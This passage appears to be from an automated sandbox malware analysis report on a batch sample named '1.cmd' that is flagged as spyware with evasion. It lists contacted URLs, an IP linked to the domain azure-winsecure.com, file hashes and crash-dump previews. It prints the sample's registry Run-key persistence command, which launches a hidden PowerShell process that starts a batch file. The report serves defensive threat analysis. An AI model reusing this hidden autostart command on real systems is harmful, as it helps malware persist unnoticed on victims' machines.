          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpfalse
            		unknown
            https://go.micropowershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://upx.sf.netAmcache.hve.10.drfalse
            • URL Reputation: safe
            		unknown
            http://www.microsoft.co9=powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmpfalse
              		unknown
              https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqMicrosoft-Windows-PushNotification-Platform%4Operational.evtx.50.drfalse
                		unknown
                https://aka.ms/pscore6powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.drfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.microsvchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpfalse
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://Passport.NET/tbMicrosoft-Windows-LiveId%4Operational.evtx.50.drfalse
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore6xGxpowershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            192.64.119.55
                            		azure-winsecure.comUnited States
                            		22612NAMECHEAP-NETUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1525473
                            Start date and time:2024-10-04 09:41:04 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 11m 29s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:42
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:19
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:1.cmd
                            Detection:MAL
                            Classification:mal100.spyw.evad.winCMD@55/94@1/1
                            EGA Information:
                            • Successful, ratio: 93.3%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .cmd

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.189.173.21, 20.42.65.92, 52.182.143.212
                            • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 2852 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtFsControlFile calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            03:42:00API Interceptor4x Sleep call for process: WMIC.exe modified
                            03:42:03API Interceptor22278x Sleep call for process: powershell.exe modified
                            03:42:22API Interceptor2x Sleep call for process: WerFault.exe modified
                            03:43:46API Interceptor250x Sleep call for process: winlogon.exe modified
                            03:43:47API Interceptor222x Sleep call for process: lsass.exe modified
                            03:43:47API Interceptor1553x Sleep call for process: svchost.exe modified
                            03:43:49API Interceptor198x Sleep call for process: dwm.exe modified
                            03:44:00API Interceptor20x Sleep call for process: cmd.exe modified
                            03:44:00API Interceptor17x Sleep call for process: WMIADAP.exe modified
                            03:44:00API Interceptor20x Sleep call for process: conhost.exe modified
                            08:43:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                            08:43:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASNs

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_9f80d8da-31df-4b2c-bcfb-31830925e2b8\Report.wer

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.508739593746198
                            Encrypted:false
                            SSDEEP:192:7w2ylmGvy9d0eLDkjaVTyJN5Wl4lg6zuiFGZ24lO8n:TygGvykeLDkj+T+5gqg6zuiFGY4lO8n
                            MD5:37B792005EDF19E81B1ABF66F4816740
                            SHA1:25CE8BA8EC3598029550DF1167F687BA149224E9
                            SHA-256:49E129B1A9E5646E7F885D389A8DE9904AEB4E52AF89A5E08C72CB88D346737A
                            SHA-512:7B2F533BA9D60EE4ADB1B6E81F0C0825BEE43257CE2B344651D24929D7BE3D6C9874D52065B8595C9A0FBDCEB941D6B41A0B2EFCF63E4D052415AB82FFAE2B7B
                            Malicious:false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.0.1.3.2.8.8.0.8.4.7.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.0.1.3.3.0.0.4.2.8.4.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.8.0.d.8.d.a.-.3.1.d.f.-.4.b.2.c.-.b.c.f.b.-.3.1.8.3.0.9.2.5.e.2.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.a.c.a.5.e.8.-.4.3.c.0.-.4.a.7.3.-.a.d.a.4.-.e.6.c.d.0.8.5.7.d.2.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.0.4.-.0.0.0.1.-.0.0.1.4.-.a.0.9.8.-.d.5.e.6.3.0.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_fa750e7d-2e62-4703-86c1-e8771ad7fadd\Report.wer

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.5087593177022136
                            Encrypted:false
                            SSDEEP:192:VkbkmGpy9d0eLDkja1TyGcDulAlg6zuiFGZ24lO8n:mjGpykeLDkjOTQD4Cg6zuiFGY4lO8n
                            MD5:FAC113DBE19E9E416829F0587F94C759
                            SHA1:31F9BCF76E16F2E3B6BF8BDE349FC80747F8C834
                            SHA-256:D8A5F4773BAD869F44A72EEC61DD3366B0EF6FE88220DD8F09840002DD1BAF6C
                            SHA-512:7105DB3A8A2FAB3103B45DC940E8AD42B7E056DC59057AC7701E011DF7FC33183A6C9234F77F2A3DB86E3A6E90989A83684AC91AF86DCD547966DE1F956B93E6
                            Malicious:false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.0.1.3.8.3.3.4.2.8.6.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.0.1.3.8.4.5.1.4.7.3.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.5.0.e.7.d.-.2.e.6.2.-.4.7.0.3.-.8.6.c.1.-.e.8.7.7.1.a.d.7.f.a.d.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.9.d.9.e.1.f.-.8.5.6.9.-.4.a.e.6.-.9.3.d.f.-.a.5.7.0.6.f.b.9.0.2.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.d.c.-.0.0.0.1.-.0.0.1.4.-.d.f.1.4.-.6.1.0.7.3.1.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3551.tmp.dmp

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Fri Oct 4 07:43:03 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):910700
                            Entropy (8bit):3.5216072049855582
                            Encrypted:false
                            SSDEEP:12288:ZcS70pwchF98ojZaontt1gObqO/Q+5Ax:iS70Ki8iZaot/7q4QU
                            MD5:0186EDC09DE9EC5B51F90584832B1AFD
                            SHA1:0826BD65936D35E8DC1FB60C15B9F1424D2FF096
                            SHA-256:9D41FB17AF3AB8C3638D7F3984A7E00D7AA1BCB026D532059AB1B973DF394967
                            SHA-512:FAA26588EC77E295124925D36AEC108CEA3A436C9D2665D0776F6F7C8E2D9154CB851ADEE13AFFF6CBACF365458ED15D4369951A70A28B6270A9DDE0A41D3E44
                            Malicious:false
                            Preview:MDMP..a..... ..........f............$............'..8........;...2......................`.......8...........T............_..\............m...........o..............................................................................eJ......|p......Lw......................T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER38BD.tmp.WERInternalMetadata.xml

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8782
                            Entropy (8bit):3.6959762702757173
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJWMfY6YeRY6gmfZaP4pWEE89bfS8sfMVm:R6lXJVw6YYFgmfQPwfofz
                            MD5:429C3655DB86FC5D632BCA554BD68B74
                            SHA1:3DCB1437F73F7EB3758D2A5671A3C0A89EA23769
                            SHA-256:87A0C3E6C8C1708DED1F242FCF73E74ACD6A8FE515738B2EAC82DCA6F2E89986
                            SHA-512:35DAC13B861884E674C4564F014E3392248A9511E3FD3CE380AEE2FF5B5BCB2AE1BC15037616B048FDDCC14B784AA22D3B64D2DFDFD50772545E99E762BEF6DD
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.2.8.<./.P.i.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER392B.tmp.xml

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.436875741874379
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsSJg771I9fFyWpW8VYT0Ym8M4JQ9wSFRyq8vlw1ytfhd:uIjfgI7EF7VKBJQGSWu1ufhd
                            MD5:2E7AF1C2D5455D8BD63955ADCD51D1CA
                            SHA1:8E81343878DEF226DC1277F09E2F42D745B56CB4
                            SHA-256:02C13AE00132915770DF9ABB6EC83AE10C4227FA42AFA44636E92FEB76CEAE3C
                            SHA-512:9B4955C2C8DEB052381A230C2A5E694E7739EEFD910FEAD0BD45B1815C56E260A34017C444679CF7B096AEA750A1F93B89ABA2B4BF4CF8610629A2957D307BAE
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528405" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER604E.tmp.dmp

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Fri Oct 4 07:42:09 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):929658
                            Entropy (8bit):3.461112606558634
                            Encrypted:false
                            SSDEEP:6144:JvM4JE70/iM52zie+wdfd3lD6P3cwI/Lq8jEKr3QGnpK0K:eM52zie+o3NA3Bcq8jEKrQGnp
                            MD5:01906B17B4E0673452E66F364167027B
                            SHA1:59C6FE188D94AA7562042052151AD5A0A039794F
                            SHA-256:8694B873A8C186696BAD061EDB951963A4E95FEA77A0EBC2FB0E9B99BB66B9D1
                            SHA-512:462923DB93CAE2F913C6BAF3B3185BADC93FA7CD4A192160B6B71FC962B205ECFFF80A2D0300DD6CEE0B385A8F532B7B07B9B17EC104248813081C00B873074F
                            Malicious:false
                            Preview:MDMP..a..... .......Q..f............T............'..h....... ;...3......T...............`.......8...........T...........`_..............4n.......... p..............................................................................eJ.......p......Lw......................T...........J..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6446.tmp.WERInternalMetadata.xml

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8582
                            Entropy (8bit):3.693509751945523
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJf1L3O6YHD61gmfZaP4pWEM89bb1Psfpzpm:R6lXJtrO6Yj61gmfQPYbmfa
                            MD5:2D0362889AB324F37447CE118E10AA1F
                            SHA1:22404E67C9777467F4DF17B789448563D1366C5F
                            SHA-256:6BCED54C544A05B0A5A033EECFD1CCC4E1D42122FEEF9C6EA48C15AACC8A1A81
                            SHA-512:5C71E3757CFC1F8C59E0CDE020E18BBDD7EB3A8625B82E8EB31BA5B7E822CC9DEC83F673BCC23825790CCFD1401B8E36E2EB9E2CBAA8ABBF6031824B68EE946E
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.8.4.<./.P.i.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6476.tmp.xml

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.433221160182472
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsLtJg771I9fFyWpW8VYJ5Ym8M4JQ9wSFKLoyq8vlwOytfjd:uIjfLHI7EF7V6oJQGJMWuOufjd
                            MD5:DFBAB05D482F5526D54EE52B5FB16057
                            SHA1:E266952E1D8D6B1FAB0AD130B062969B5A1BDBCA
                            SHA-256:248DE062EA64BD2AC8F0E6B81CCC293F4D885BFF18567FEBD1A001DD10FDA1DB
                            SHA-512:6371C8494E79DE08F2333EF333C8D63FF22CC1CBFDEC986E5445655203CE2791AA2DE51AFCBF848E49C008B6E9ACE114DC399FE56A67FDCD395674B4CC3A57E9
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528404" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2916
                            Entropy (8bit):5.370813493058233
                            Encrypted:false
                            SSDEEP:48:4SaAzsSU4Yymdax4RIoUP7m9qr9t5/78NfpHcRDGx3axIZVEouNHJBVrH/jCB:taAzlHYv+IfB9qrh7KfpRjPEo2dL8
